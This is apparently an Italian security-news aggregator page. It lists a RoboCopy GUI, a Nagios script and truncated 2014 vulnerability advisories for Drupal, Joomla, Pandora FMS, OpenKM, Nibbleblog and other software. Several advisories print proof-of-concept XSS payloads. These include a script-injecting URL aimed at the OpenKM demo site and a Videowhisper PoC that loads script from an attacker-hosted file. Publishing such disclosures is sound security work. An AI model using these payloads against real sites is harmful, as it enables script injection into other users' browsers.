RoboCop RoboCopy – Interfaccia grafica per RoboCopy

4 dicembre 2014 - Fonte: http://www.winserver.it
“RoboCop RoboCopy”…il nome sembra quasi un fumetto ma questa utility reperibile su Sourceforge, aggiunge una comodissima interfaccia grafica all’utilizzo di Robocopy. Con questo software saprà molto più facile gestire una sincronizzazione e soprattutto “parametrizzare” l’utilizzo di Robocopy in modo da non utilizzare la riga di comando per la varie opzioni. Il software inoltre aggiunge alcune […]...

Leggi il seguito »

Drupal Memory Exhaustion

2 dicembre 2014 - Fonte: http://www.mondounix.com
====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Drupal < 7.34 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of
service).
 
====================================================================
Time Line:
====================================================================
 
November 19, 2014 - A Drupal security update and the security advisory is published.
 
====================================================================
Proof of Concept:
====================================================================
 
Generate...

Leggi il seguito »

Nagios e contenuti Web: script per verificare il codice HTML del nostro sito Internet

25 novembre 2014 - Fonte: http://nazarenolatella.myblog.it

In questo blog ho dedicato diversi post a Nagios, essendo, a mio avviso, uno dei migliori NMS open source in circolazione. Tra i vari plugin messi a disposizione dal suddetto software di monitoraggio vi è check_http, il quale è in grado di inviare delle richieste apposite al sito Web che intendiamo monitorare, segnalando eventuali problemi di connessione o errori di protocollo (401, 403, 404, 500, ecc.).

...

Leggi il seguito »

Supr Shopsystem 5.1.0 Cross Site Scripting

23 novembre 2014 - Fonte: http://www.mondounix.com
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
 
 
Release Date:
=============
2014-11-07
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1353
 
 
Common Vulnerability Scoring System:
====================================
3.1
 
 
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store. 
Without installation and own webspace you can begin to create products and content right after...

Leggi il seguito »

Joomla Simple Email Form 1.8.5 Cross Site Scripting

20 novembre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

Leggi il seguito »

Pandora FMS 5.1SP1 Cross Site Scripting

18 novembre 2014 - Fonte: http://www.mondounix.com
I. VULNERABILITY
 
-------------------------
 
XSS Reflected in Page visualization agents in Pandora FMS v5.1SP1 - Revisión PC141031
 
II. BACKGROUND
Pandora FMS is the monitoring software chosen by several companies all around the world for managing their IT infrastructure. Besides ensuring high performance and maximum flexibility, it has aIII.
 
DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in Pandora FMS in page visualization agents, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.
 
The code injection is done through the parameter "refr" in the page “/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=”
 
IV....

Leggi il seguito »

Openkm Document Management System 6.4.17 Cross Site Scripting

18 novembre 2014 - Fonte: http://www.mondounix.com
Openkm Document Management System Suffers From Cross Site Scripting Attack
 
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili
ties/openkm.jpg
 
Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Auther :  <https://www.facebook.com/khalil.shr> Khalil
<https://www.facebook.com/khalil.shr> Shreateh
 
Auther Website: http://khalil-shreateh.com
Status : Reported .
Report Link : http://issues.openkm.com/view.php?id=3056
 
Attack Description
 
log in with any user
Navigate to :
<http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Eale
rt%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
>
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealer
t%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
 
 
 
POC...

Leggi il seguito »

Nibbleblog 4.0.1 Cross Site Scripting

18 novembre 2014 - Fonte: http://www.mondounix.com
=============================================
MGC ALERT 2014-002
- Original release date: March 5, 2014
- Last revised:  November 17, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Reflected XSS in Nibbleblog <= v4.0.1
 
II. BACKGROUND
-------------------------
Nibbleblog is a powerful engine for creating blogs, all you need is PHP to
work.
 
III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in Nibbleblog, that allows
the execution of arbitrary HTML/script code to be executed in the context
of the victim user's browser.
 
The code injection...

Leggi il seguito »

BookFresh Persistent Cross Site Scripting

8 novembre 2014 - Fonte: http://www.mondounix.com
Document Title:
===============
BookFresh - Persistent Clients Invite Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1351
 
 
Release Date:
=============
2014-10-28
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1351
 
 
Common Vulnerability Scoring System:
====================================
3.9
 
 
Product & Service Introduction:
===============================
BookFresh is an innovative scheduling software program that sets the standard for 21st century appointment management and creation for small businesses. 
Bookfresh connects small business owners and customers instantly....

Leggi il seguito »

Drupal 7 Videowhisper Cross Site Scripting

7 novembre 2014 - Fonte: http://www.mondounix.com
Hello,
 
Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7.
 
Vendor Notification: 22, Oct 2014
 
Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php
 
POC: http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt
 
The content of xss.txt:
<root>
  <script xmlns="http://www.w3.org/2000/svg"><![CDATA[
    alert('XSS');
  ]]></script>
</root>
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.
 
Best regards

...

Leggi il seguito »